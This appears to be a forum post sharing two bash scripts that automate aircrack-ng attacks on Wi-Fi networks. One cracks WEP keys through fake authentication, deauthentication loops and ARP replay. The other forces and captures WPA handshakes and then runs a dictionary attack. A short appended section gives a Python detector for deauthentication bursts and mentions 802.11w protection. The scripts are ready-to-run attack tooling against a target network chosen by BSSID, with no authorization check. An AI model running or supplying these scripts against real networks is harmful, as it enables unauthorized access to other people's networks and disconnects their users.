auto-wep.sh; wpa-hcap.sh


frog_bong

We all know that Wired Equivalent Privacy is entirely breakable and that Wi-Fi Protected Access can be broken using a word-list or hash-tables. Here are a couple of scripts to HELP you test these things. Make sure aircrack-ng is installed.

auto-wep.sh:

#!/bin/bash
##
### Automatic wep-cracking script(run this as ROOT): by frogbong(frogbong.wilson@gmail.com)
##  Note: This script will not work 100% of the time, it is merely a way to reduce typing
#
export IFACE
export BSSID
export CHANNEL

### Check for argument
if [ -z "$1" ]
  then echo "Usage: $0 <interface>"
  echo "Set MONITOR mode interface."
  exit 1
fi

### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng $IFACE
echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID
echo "Enter AP Channel: "; read CHANNEL
echo "Enter Target MAC(optional): "; read CLNTMAC # read here but not used by the rest of this script
echo "Starting auto-wep.sh with these parameters: "
echo "   Interface: $IFACE"; sleep 1
echo "       BSSID: $BSSID"; sleep 1
echo "     Channel: $CHANNEL"; sleep 1

### Start wep cracking process using components of aircrack-ng in the background (&)
# Start airodump-ng
xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w AUTO-WEP $IFACE" &

# Start aireplay-ng for fake auth. 
sleep 3
xterm -e "sudo aireplay-ng -1 0 $IFACE -a $BSSID" &

# Wait for fake association before deauth.
sleep 5
xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; sleep 10; done" &

# Start aireplay-ng for ARP replay
xterm -e "sudo aireplay-ng -3 $IFACE -b $BSSID" &

# Start cracking .cap file after giving some time to generate initialization vectors(iv's)
sleep 60
sudo aircrack-ng AUTO-WEP*.cap

wpa-hcap.sh:

#!/bin/bash
##
### Script to help capture wpa-handshake(run this as ROOT): by frogbong(frogbong.wilson@gmail.com)
##
#

export IFACE 
export BSSID
export CHANNEL
export TIME # time between deauth. broadcast
export CLIENT # client to deauth. (optional)

### Check for argument
if [ -z "$1" ]
  then echo "Usage: $0 <interface>"
  echo "Set MONITOR mode interface."
  exit 1
fi

### Start airodump-ng to collect target information
IFACE=$1
sudo airodump-ng $IFACE
echo "### TARGET INFORMATION ###"
echo "Enter BSSID: "; read BSSID 
echo "Enter AP Channel: "; read CHANNEL
echo "Enter deauth. delay: "; read TIME 
echo "Enter client(optional): "; read CLIENT
echo "Starting $0 with these parameters: "
echo "   Interface: $IFACE"; sleep 1
echo "       BSSID: $BSSID"; sleep 1
echo "     Channel: $CHANNEL"; sleep 1
echo "  Time Delay: $TIME"; sleep 1

if [ "$CLIENT" != "" ]
  then echo "      Client: $CLIENT"; sleep 1
fi

### Start capture and regular deauth.
# Start airodump-ng to capture handshake
xterm -e "sudo airodump-ng --bssid $BSSID --channel $CHANNEL -w WPA-HS $IFACE" &

# Start deauth every $TIME seconds
sleep 3 # wait for airodump to startup

if [ "$CLIENT" != "" ] 
  then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID -c $CLIENT; echo 'Sleeping for $TIME seconds'; sleep $TIME; done" &
fi

if [ "$CLIENT" = "" ]
  then xterm -e "while true; do sudo aireplay-ng -0 9 $IFACE -a $BSSID; echo 'Sleeping for $TIME second(s)'; sleep $TIME; done" &
fi

# Start aircrack-ng in wpa mode to parse the .cap file for handshakes
while true; do aircrack-ng -a 2 WPA*.cap -w /usr/share/dict/american-english; sleep 30; done
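
From a defender's side, the `aireplay-ng -0` loops in both scripts show up on the air as bursts of deauthentication frames from the AP's BSSID, which a wireless IDS flags by counting management frames per sender in a sliding time window. The following is an added example, not part of the original post or of the aircrack-ng suite; the frame records, MAC addresses and thresholds are constructed.

```python
from collections import deque

DEAUTH, BEACON = 0x0C, 0x08          # 802.11 management-frame subtypes
AP, CLIENT, BCAST = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff", "ff:ff:ff:ff:ff:ff"  # constructed MACs

def deauth_bursts(frames, window=2.0, threshold=8):
    """Flag every sender that emits more than `threshold` deauth frames inside any
    `window`-second span. `frames` are (seconds, subtype, src, dst) records such as a
    monitor-mode sniffer or WIDS would export. Returns [(src, window_start, count)]."""
    recent = {}                        # src -> timestamps of its deauths still inside the window
    alerts, flagged = [], set()
    for ts, subtype, src, _dst in sorted(frames):
        if subtype != DEAUTH:
            continue
        q = recent.setdefault(src, deque())
        q.append(ts)
        while ts - q[0] > window:      # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold and src not in flagged:   # one alert per offending sender
            flagged.add(src)
            alerts.append((src, q[0], len(q)))
    return alerts

# Constructed capture: beacons every 100 ms, one ordinary deauth at t=3 s, then a
# 10-frame broadcast deauth burst at t=10 s of the kind a scripted deauth loop produces.
SAMPLE = [(i / 10, BEACON, AP, BCAST) for i in range(150)]
SAMPLE.append((3.0, DEAUTH, AP, CLIENT))
SAMPLE += [(10.0 + i / 10, DEAUTH, AP, BCAST) for i in range(10)]

if __name__ == "__main__":
    for src, start, count in deauth_bursts(SAMPLE):
        print(f"deauth burst from {src}: {count} frames within 2 s starting at t={start:.1f}s")
```

Networks that enforce 802.11w Protected Management Frames discard unauthenticated deauth frames, so the loops above have no effect on their clients; the detector still sees the burst and can raise an alert.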
